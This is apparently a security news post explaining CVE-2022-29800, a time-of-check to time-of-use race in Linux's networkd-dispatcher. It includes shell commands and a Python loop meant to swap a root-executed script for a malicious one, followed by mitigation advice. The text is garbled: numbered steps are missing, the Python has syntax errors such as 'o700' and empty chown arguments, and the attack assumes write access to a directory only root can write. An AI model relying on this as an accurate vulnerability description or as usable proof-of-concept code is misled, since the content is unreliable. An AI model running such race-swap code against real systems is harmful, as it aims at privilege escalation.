CVE CyberSecurity Database News

CVE-2022-29800 - Exploiting a TOCTOU Race Condition in networkd-dispatcher

Poster -

Keywords: CVE-2022-29800, networkd-dispatcher, TOCTOU, race condition, privilege escalation, vulnerability, exploit

Introduction

In May 2022, a security flaw dubbed CVE-2022-29800 was disclosed in the popular Linux utility, networkd-dispatcher. This issue centers around a _Time-of-Check to Time-of-Use_ (TOCTOU) race condition, creating a window of opportunity for local attackers to escalate privileges or execute unauthorized code.

This post will explain the vulnerability in simple terms, dissect the exploit step-by-step using easy-to-follow code examples, and link to original technical sources.

What is networkd-dispatcher?

networkd-dispatcher is a lightweight daemon shipped with many Linux distributions (such as Ubuntu) that reacts to events from systemd-networkd. For example, when a network interface goes up or down, it locates and runs scripts from directories like /etc/networkd-dispatcher/. These scripts are run with root privileges, so it’s important they’re secured.

What’s a TOCTOU Race Condition?

TOCTOU, or “_Time-of-Check to Time-of-Use_,” describes a situation where a program checks something (like file ownership or permissions), but the thing changes before the program uses it. This tiny window is enough for an attacker to sneak in unauthorized changes.

When networkd-dispatcher receives an event

1. It scans script directories (like /etc/networkd-dispatcher/) for executable files.

If safe, runs the script as root.

The flaw: Between steps 2 and 3, an attacker can swap out a legit script with a malicious one (using symlinks or a quick file replacement).

Check: Script file’s permissions are “safe.”

- Pause / Window: Attacker swaps the file after the check.

Step-by-Step: How an Attack Works

Let’s say you have write access to a script directory (not always the case, but possible through other exploits or poor setup).

Place a benign script:

echo -e '#!/bin/bash\necho Safe script' > /etc/networkd-dispatcher/routable.d/10-demo.sh
chmod 700 /etc/networkd-dispatcher/routable.d/10-demo.sh
chown root:root /etc/networkd-dispatcher/routable.d/10-demo.sh

Quickly swap in a malicious script:

echo -e '#!/bin/bash\nid > /tmp/root.txt' > /etc/networkd-dispatcher/routable.d/10-demo.sh
chmod 777 /etc/networkd-dispatcher/routable.d/10-demo.sh

4. Result: If you time it right, networkd-dispatcher checks the original’s safety, but runs your malicious code as root.

Here’s a Python snippet to automate the swap

import os
import time

safe_script = '/etc/networkd-dispatcher/routable.d/10-demo.sh'
malicious_script = '/tmp/malicious.sh'

# 1. Place the safe script
with open(safe_script, 'w') as f:
    f.write('#!/bin/bash\necho Safe script\n')
os.chmod(safe_script, o700)
os.chown(safe_script, , )  # root:root

# 2. Prepare malicious script
with open(malicious_script, 'w') as f:
    f.write('#!/bin/bash\nid > /tmp/root.txt\n')
os.chmod(malicious_script, o777)

# 3. Wait and swap (race window)
while True:
    try:
        # Try to swap the file really fast
        os.rename(malicious_script, safe_script)
    except Exception:
        pass
    time.sleep(.001)  # Tight loop, adjust timing to increase chance of winning the race

Note: For most users, /etc/networkd-dispatcher is writable only by root. However, if misconfigured, or if you have access due to other weaknesses, this attack is feasible.

Video & Technical References

- Original Ubuntu CVE Bug
- GitHub issue discussion
- Red Hat Security Advisory
- Canonical USN-5515-1

Mitigation and Patching

- Upgrade: Patch your system. Most distributions have fixed this by tightening checks and making the script loading process atomic.
- Lock Down Permissions: Make sure /etc/networkd-dispatcher and its subdirectories are writable only by root.

Conclusion

The CVE-2022-29800 vulnerability is a textbook example of why _race conditions_ can be dangerous, especially in programs that execute code as root. Always keep your system up-to-date and keep script directories tightly controlled.

Remember: TOCTOU == “Time-of-check ≠ Time-of-use”—if there’s a window, attackers will find it!


Feel free to share or adapt this post. Stay Secure!

Timeline

Published on: 09/21/2022 19:15:00 UTC
Last modified on: 09/23/2022 17:16:00 UTC